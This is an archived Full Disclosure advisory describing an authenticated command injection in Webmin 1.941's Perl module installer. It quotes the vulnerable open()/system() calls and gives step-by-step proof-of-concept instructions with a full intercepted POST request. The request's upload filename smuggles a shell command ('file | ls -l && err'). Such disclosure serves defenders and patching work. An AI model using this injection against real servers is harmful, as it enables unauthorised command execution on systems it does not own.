lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAJ-5kWYXfZUypUm1Xtj2HBuG_XkDSMhRtZ=95b1y_bv00pZffg@mail.gmail.com>
Date: Wed, 6 May 2020 08:47:23 +0200
From: raki ben hamouda <raki7bh@...il.com>
To: "submit@...sec.com" <submit@...sec.com>,
 Packet Storm <packet@...ketstormsecurity.com>, 
 "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] Webmin (Upload Module) Remote Command Injection Vulnerability

Document Title:
===============
Webmin 1.941 (Install Module) Remote Command Injection Vulnerability



Common Vulnerability Scoring System:
====================================
8.5


Vulnerability Class:
====================
Command Injection


Current Estimated Price:
========================
2.000€ - 3.000€


Affected Product(s):
====================
Webmin

Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
A remote authenticated Command Injection vulnerability has been discovered
in the official Webmin product .
The security vulnerability allows a remote attacker with only permission to
"Install Module Perl Component"
to execute arbitrary Operating System Commands.
this is due to no check performed on the user input "upload" parameter when
it passed to open() perl function
causing execution of any command .

The vulnerability is located in the `/cpan/download.cgi` modules and the
`upload` parameter
of the module name to install.

The security risk of the arbitrary RCE vulnerability is estimated as High
with a cvss (common vulnerability scoring system) count of 8.5.
Exploitation of the RCE web vulnerability requires a low privilege
web-application user account and no user interaction.
Successful exploitation of the vulnerability results in loss of
availability, integrity and confidentiality.

===============================
##When digging in code :

I needed only to reach this line code to make it work :

&install_error(&text('download_etar', "<tt>$tar</tt>"));

However passing user input directly to open() is not a solution, this
includes also all these lines :

    open(TAR, "( gunzip -c $pfile | tar tf - ) 2>&1 |");
    system("cd $mtemp ; gunzip -c $dirs{$d} | tar xf - >/dev/null");
    system("$cmd >/dev/null 2>&1 </dev/null");
    %needreqs = map { eval "use $_"; $@ ? ($_, 1) : ($_, 0) } @allreqs;



=============================

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] /cpan/download.cgi

Vulnerable Parameter(s):
[+] upload


Server version
1.941


Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers with low
privileged web-application user account and with no user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.


1-Attacker must have permission to the Install Perl Modules component
2-Go to "Others"->"Perl Modules"->"Install Modules"->Select 'From Uploaded
File'->Pick Any file
3-attacker intercepts the request that follows :

--- PoC Session Logs [POST] ---

POST /cpan/download.cgi HTTP/1.1
Host: 192.168.239.129:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-PJAX: true
X-PJAX-Container: [data-dcontainer]
X-PJAX-URL: download.cgi
X-Requested-From: cpan
X-Requested-From-Tab: webmin
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------
7478318236766462923988573986
Content-Length: 682
Origin: https://192.168.239.129:10000
Connection: close
Referer: https://192.168.239.129:10000/cpan/?xnavigation=1
Cookie: redirect=1; testing=1; sid=110b33c42e470d0aafa5ab11fe9d09a7

-----------------------------7478318236766462923988573986
Content-Disposition: form-data; name="cpan"


-----------------------------7478318236766462923988573986
Content-Disposition: form-data; name="local"


-----------------------------7478318236766462923988573986
Content-Disposition: form-data; name="source"

1
-----------------------------7478318236766462923988573986
Content-Disposition: form-data; name="upload"; filename="file | ls -l &&
err"
Content-Type: [nothing here]

[Nothing Here]
-----------------------------7478318236766462923988573986
Content-Disposition: form-data; name="url"


-----------------------------7478318236766462923988573986--


4-Modify the "upload" parameter with string : "file | ls -l && err"

##Successfully reproduced the Vulnerability.

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ